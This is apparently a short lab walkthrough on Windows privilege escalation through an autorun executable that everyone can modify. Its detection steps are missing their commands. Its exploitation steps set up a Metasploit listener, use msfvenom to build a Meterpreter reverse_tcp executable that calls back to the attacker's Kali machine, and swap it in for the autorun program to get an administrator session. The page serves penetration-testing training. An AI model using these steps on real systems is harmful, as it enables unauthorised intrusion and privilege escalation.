Autoruns

An autorun file that everyone can modify can be exploited

Detection

1. Open command prompt and type:

2. In Autoruns, click on the ‘Logon’ tab. 3. From the listed results, notice that the “My Program” entry is pointing to “C:\Program Files\Autorun Program\program.exe”. 4. In command prompt type: (To check acccess of a program)

5. From the output, notice that the “Everyone” user group has “FILE_ALL_ACCESS” permission on the “program.exe” file.

Powerup may also be detect it.

Exploitation

1. Kali VM

1. Open command prompt and type: msfconsole 2. In Metasploit (msf > prompt) type: use multi/handler 3. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp 4. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address] 5. In Metasploit (msf > prompt) type: run 6. Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o program.exe 7. Copy the generated file, program.exe, to the Windows VM.

2. Windows VM

1. Place program.exe in ‘C:\Program Files\Autorun Program’. 2. To simulate the privilege escalation effect, logoff and then log back on as an administrator user.

3. Kali VM

1. Wait for a new session to open in Metasploit. 2. In Metasploit (msf > prompt) type: sessions -i [Session ID] 3. To confirm that the attack succeeded, in Metasploit (msf > prompt) type: getuid

Last updated